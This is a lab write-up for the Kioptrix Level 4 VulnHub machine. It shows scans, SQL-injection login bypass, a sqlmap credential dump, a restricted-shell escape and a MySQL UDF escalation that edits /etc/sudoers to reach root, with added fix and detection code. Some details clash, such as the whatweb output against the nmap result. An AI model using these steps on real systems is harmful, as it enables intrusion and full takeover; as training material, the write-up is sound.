Escape

Overview

| Field | Value |
|---|---|
| Name | Template |
| Release Date | 2024-03-01 |
| Write-up Author | kill3r |
| Machine Author | kill3r |
| Difficulty | Medium |
| User Flag | |
| Root Flag | |
| Link | https://www.vulnhub.com/entry/kioptrix-level-13-4,25 |

Related skills

  1. MySQL UDF
  2. Restricted shell bypass

Weak points

  1. MySQL UDF
  2. Restricted shell bypass

Nmap scan

```bash
ports=$(nmap -p- --min-rate=1000 -T4 192.168.150.130 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 192.168.150.130 -oN nmap.txt
# The first command scans every port (1 to 65535) on the target host; --min-rate=1000 sends at least 1000 packets per second and -T4 selects the aggressive timing template.
# grep -oE '(^[0-9][^/tcp]*)' extracts the port numbers from the output, and tr '\n' ',' joins them into a single comma-separated string.
# The second command rescans only the extracted ports: -p$ports supplies the port list, -sV performs service version detection, -sC runs the default NSE scripts for common checks, -O performs OS detection, and -oN nmap.txt writes the results to nmap.txt.
```
```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.150.130 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.150.130 -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 14:04 CST
Nmap scan report for 192.168.150.130
Host is up (0.00048s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:09:FE:DB (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2024-02-26T09:05:00-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 10h30m00s, deviation: 3h32m07s, median: 8h00m00s
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
```

Enumeration

SMB enumeration

Port: 139 389 445 636

  • enum4linux-ng 127.0.0.1
```bash
$ enum4linux-ng  <ip>
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# enum4linux-ng 192.168.150.130 > smb.result

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# more smb.result
==================================================
| OS Information via RPC for 192.168.150.130 |
==================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.28a)
OS version: '4.9'
OS release: not supported
OS build: not supported
Native OS: Unix
Native LAN manager: Samba 3.0.28a
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)


┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# cat smb.result | grep user
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'gmbklnrd', password ''
[H] Rerunning enumeration with user 'gmbklnrd' might give more results
[*] Enumerating users via 'querydispinfo'
[+] Found 5 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 5 user(s) via 'enumdomusers'
[+] After merging user results we have 5 user(s) total:
username: root
username: loneferret
username: john
username: robert
username: nobody
```
  • MSF-SMB
```bash
# Fingerprint the version over SMB
msf6 > use auxiliary/scanner/smb/smb_version
# Enumerate shares
msf6 > use auxiliary/scanner/smb/smb_enumshares
# Enumerate user information over SMB
msf6 > use auxiliary/scanner/smb/smb_lookupsid
```

Web

HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

  • Finger: obtains the list of users on a system and configuration information about a specific user

whatweb

```bash
# Identifies the target site's technology stack (CMS, plugins, frameworks and other site-related information) by analysing the server's responses and page content
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.150.130
http://192.168.150.130 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.150.130], Script[text/javascript]
```
  • Directory enumeration

dirb http://192.168.150.130

dirsearch -u http://192.168.150.130 -r

gobuster dir -w ... -u http://192.168.150.130 -x html,php,js,bak

```bash
┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.150.130 -x html,php,js,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.150.130
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,html,php,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 358] [--> http://192.168.150.130/images/]
/index.php (Status: 200) [Size: 1255]
/.html (Status: 403) [Size: 327]
/index (Status: 200) [Size: 1255]
/member (Status: 302) [Size: 220] [--> index.php]
/member.php (Status: 302) [Size: 220] [--> index.php]
/logout (Status: 302) [Size: 0] [--> index.php]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/john (Status: 301) [Size: 356] [--> http://192.168.150.130/john/]
/robert (Status: 301) [Size: 358] [--> http://192.168.150.130/robert/]
/.html (Status: 403) [Size: 327]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
```

  • Vulnerability scanning

```bash
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/
```

wordlist

  • cewl.list:cewl http://192.168.150.130/ -w dict.txt

  • pass.list
```text
MyNameIsJohn
ADGAdsafdfwt4gadfga==
```
  • user.list
```text
root
loneferret
john
robert
nobody
```
  • hash.list
  • information.list

Reproduction steps

Browse the target and look for functionality.

A login form is found; try the universal-password payloads `1" or "1"="1` / `1' or '1'='1`.

The page returns an error, and the single quote in the username field turns out to be escaped. Try a normal username instead and keep the universal-password payload in the password field only.

That confirms SQL injection. Since the form is submitted as a POST request, capture it with Burp and run it through sqlmap.

Save the captured request to a file.

Information analysis

```bash
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# sqlmap -r sql.txt --leve 3 --batch --dbs
available databases [3]:
[*] information_schema
[*] members
[*] mysql

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# sqlmap -r sql.txt --leve 3 --batch -D members --tables
Database: members
[1 table]
+---------+
| members |
+---------+

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# sqlmap -r sql.txt --leve 3 --batch -D members -T members --dump
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password | username |
+----+-----------------------+----------+
| 1 | MyNameIsJohn | john |
| 2 | ADGAdsafdfwt4gadfga== | robert |
+----+-----------------------+----------+
```
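The injection described above, reproduced as an added Python example (this is not code from the write-up, and not checklogin.php, of which the page only shows the connection header): an in-memory SQLite stand-in for the members table holding the rows sqlmap dumped, a login check built by string concatenation that escapes only the username (the behaviour observed on the page), and the parameterised form that closes the hole. The escaping method, the query shape and the function names are assumptions.

```python
import sqlite3

# Rows as dumped by sqlmap above; constructed in-memory table, stand-in for MySQL.
MEMBERS = [(1, "MyNameIsJohn", "john"), (2, "ADGAdsafdfwt4gadfga==", "robert")]


def _members_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, password TEXT, username TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", MEMBERS)
    return conn


def vulnerable_login(username, password):
    """Reconstruction of the weak pattern: quotes in the username are escaped
    (by doubling, the SQLite equivalent of the escaping the page observed),
    but the password is pasted into the query untouched."""
    query = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
             % (username.replace("'", "''"), password))
    conn = _members_db()
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        return None  # malformed query; treated as a failed login here
    finally:
        conn.close()
    # With password "' or '1'='1" the WHERE clause becomes
    # (username='john' AND password='') OR '1'='1', so every row matches.
    return rows[0][0] if rows else None


def safe_login(username, password):
    """Hardened form: placeholders keep user input out of the SQL grammar,
    so a quote inside the password is just a character to compare."""
    conn = _members_db()
    try:
        rows = conn.execute(
            "SELECT username FROM members WHERE username=? AND password=?",
            (username, password),
        ).fetchall()
    finally:
        conn.close()
    return rows[0][0] if rows else None


if __name__ == "__main__":
    payload = "' or '1'='1"
    print("vulnerable:", vulnerable_login("john", payload))  # john (bypassed)
    print("safe:", safe_login("john", payload))              # None
```

The parameterised version still compares plaintext passwords because that is what the dumped table stores; hashing them is a separate fix.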

Use the known user.list and pass.list for password spraying.

The web interface offers no further functionality.

SSH

```bash
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# ssh -o HostKeyAlgorithms=ssh-rsa john@192.168.150.130
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# ssh -o HostKeyAlgorithms=ssh-rsa robert@192.168.150.130
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$
```

Hint: the "Welcome to ... Security Systems" banner strongly suggests a restricted shell.

```bash
john:~$ python -c 'print("Hello, Python!")'
*** unknown command: python
john:~$ python3 -c 'print("Hello, Python!")'
*** unknown command: python3
john:~$ ruby -e 'puts "Hello, Ruby!"'
*** unknown command: ruby
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$
```

System information gathering

```bash
john@Kioptrix4:/tmp$ history 
1 exit
2 sudo su
3 clear
4 ls
5 cd /home/loneferret
6 ls
7 ./nc
8 rm nc
9 exit
10 id

john@Kioptrix4:/tmp$ cat /home/john/.bash_history
exit
sudo su
clear
ls
cd /home/loneferret
ls
./nc
rm nc
exit


john@Kioptrix4:/tmp$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

john@Kioptrix4:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 8.04.3 LTS
Release: 8.04
Codename: hardy
john@Kioptrix4:/tmp$

┌──(root㉿kali)-[/opt/TOP10/burp]
└─# searchsploit Ubuntu 8.04.3
--------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------- ---------------------------------
Ubuntu < 15.10 - PT Chown Arbitrary PT | linux/local/41760.txt
--------------------------------------- ---------------------------------
Shellcodes: No Results
--------------------------------------- ---------------------------------
Paper Title | Path
--------------------------------------- ---------------------------------
Debian < 5.0.6 / Ubuntu < 10.04 - Webs | english/15311-debian--5.0.6--ubu
--------------------------------------- ---------------------------------
# No usable exploit; change direction

john@Kioptrix4:/tmp$ sudo -l
[sudo] password for john:
Sorry, user john may not run sudo on Kioptrix4.

john@Kioptrix4:/tmp$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/sudoedit
/usr/bin/chfn
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/at
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/mount
/bin/ping6
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/sbin/umount.cifs
/sbin/mount.cifs
# Nothing useful here; move on
john@Kioptrix4:/home$ cd /var/www/
john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

# MySQL root has no password; check whether a third-party component allows privilege escalation
john@Kioptrix4:/var/www$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
# lib_mysqludf_sys.so is present, so try UDF privilege escalation
john@Kioptrix4:/var/www$ mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 9786
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>
```

MySQL privilege escalation

```sql
mysql> SELECT * FROM information_schema.tables WHERE table_name like '%fun%'; 
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-----------------+----------+----------------+------------------------+
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME | UPDATE_TIME | CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-----------------+----------+----------------+------------------------+
| NULL | mysql | func | BASE TABLE | MyISAM | 10 | Fixed | 3 | 579 | 1737 | 162974011515469823 | 2048 | 0 | NULL | 2012-02-04 10:00:35 | 2020-12-21 15:24:46 | 2020-12-21 10:35:01 | utf8_bin | NULL | | User defined functions |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-----------------+----------+----------------+------------------------+
1 row in set (0.00 sec)

-- There is a func table in the mysql database; check which functions it holds
mysql> select * from mysql.func;
+-----------------------+-----+---------------------+----------+
| name | ret | dl | type |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
| sys_exec | 0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)
```

The sys_exec function exists but could not be used, so try registering a new function instead.

```bash
mysql> create function sys_eval returns string soname 'udf.so';
ERROR 1046 (3D000): No database selected
mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> create function sys_eval returns string soname 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------------------+-----+---------------------+----------+
| name | ret | dl | type |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
| sys_exec | 0 | lib_mysqludf_sys.so | function |
| sys_eval | 0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
3 rows in set (0.00 sec)

mysql> select sys_eval('id');
+--------------------------+
| sys_eval('id') |
+--------------------------+
| uid=0(root) gid=0(root) |
+--------------------------+
1 row in set (0.00 sec)

-- Privilege escalation succeeded
mysql> select sys_eval('chown -R john:john /etc/sudoers');
+---------------------------------------------+
| sys_eval('chown -R john:john /etc/sudoers') |
+---------------------------------------------+
| |
+---------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye

john@Kioptrix4:/var/www$ ls -la /etc/ | grep sudoers
-r--r----- 1 john john 557 2012-02-04 09:58 sudoers
john@Kioptrix4:/var/www$ chmod +w /etc/sudoers
john@Kioptrix4:/var/www$ ls -la /etc/ | grep sudoers
-rw-r----- 1 john john 557 2012-02-04 09:58 sudoers
john@Kioptrix4:/var/www$ vi /etc/sudoers
```
```bash
john@Kioptrix4:/var/www$ sudo -l
sudo: /etc/sudoers is mode 0640, should be 0440
john@Kioptrix4:/var/www$ chmod 0440 /etc/sudoers
john@Kioptrix4:/var/www$ mysql -uroot -p
Enter password:
mysql> select sys_eval('chown -R root:root /etc/sudoers');
+---------------------------------------------+
| sys_eval('chown -R root:root /etc/sudoers') |
+---------------------------------------------+
| |
+---------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
```

```bash
john@Kioptrix4:/var/www$ sudo -l
User john may run the following commands on this host:
(root) NOPASSWD: ALL
john@Kioptrix4:/var/www$ sudo su
root@Kioptrix4:/var/www# cd /root/
root@Kioptrix4:~# whoami
root
root@Kioptrix4:~# id
uid=0(root) gid=0(root) groups=0(root)
```
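Added here as a detection example, not part of the original write-up: a scan of MySQL general-query-log lines for the two traces this escalation leaves in the database tier, a `CREATE FUNCTION ... SONAME` statement and calls into the `lib_mysqludf_sys` functions. It assumes the general log is enabled on the server; the sample lines are constructed to mirror the session above, with the MySQL 5.x log layout and the rule names being assumptions.

```python
import re

# Constructed sample of a MySQL general query log. The layout
# "YYMMDD HH:MM:SS <id> <command>\t<argument>" follows MySQL 5.x; the
# statements mirror the session shown above and are not a real capture.
SAMPLE_LOG = """\
240226 14:05:01\t   9786 Connect\troot@localhost on
240226 14:05:09\t   9786 Query\tuse mysql
240226 14:05:20\t   9786 Query\tcreate function sys_eval returns string soname 'lib_mysqludf_sys.so'
240226 14:05:31\t   9786 Query\tselect sys_eval('id')
240226 14:05:45\t   9786 Query\tselect sys_eval('chown -R john:john /etc/sudoers')
240226 14:06:02\t   9787 Query\tSELECT * FROM members WHERE username='john' AND password='MyNameIsJohn'
"""

# Optional timestamp, then connection id, command word, tab, argument.
LINE_RE = re.compile(r"^(?:\d{6} \d{1,2}:\d{2}:\d{2})?\s*(\d+) (\w+)\t(.*)$")

# Rule name -> pattern over the statement text (case-insensitive).
RULES = {
    # Registering a shared object as a UDF is how sys_eval was added above.
    "udf_create": re.compile(r"\bcreate\s+(?:aggregate\s+)?function\b.*\bsoname\b", re.I),
    # Any call into the lib_mysqludf_sys family runs OS commands as mysqld's user.
    "udf_call": re.compile(r"\bsys_(?:eval|exec|set|get)\s*\(", re.I),
}


def scan_general_log(text):
    """Return (connection_id, rule, statement) for every Query line that
    matches a rule; the connection id lets an analyst pull the whole session."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(2) != "Query":
            continue
        conn_id, _, statement = m.groups()
        for name, pattern in RULES.items():
            if pattern.search(statement):
                findings.append((int(conn_id), name, statement))
                break
    return findings


if __name__ == "__main__":
    for conn_id, rule, stmt in scan_general_log(SAMPLE_LOG):
        print(f"conn {conn_id} [{rule}] {stmt}")
```

On this machine mysqld runs as root (the `uid=0` result of `sys_eval('id')` above), so a hit on either rule is a root-level compromise, not just a database event.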

Shell as root

Save a screenshot as the flag or proof.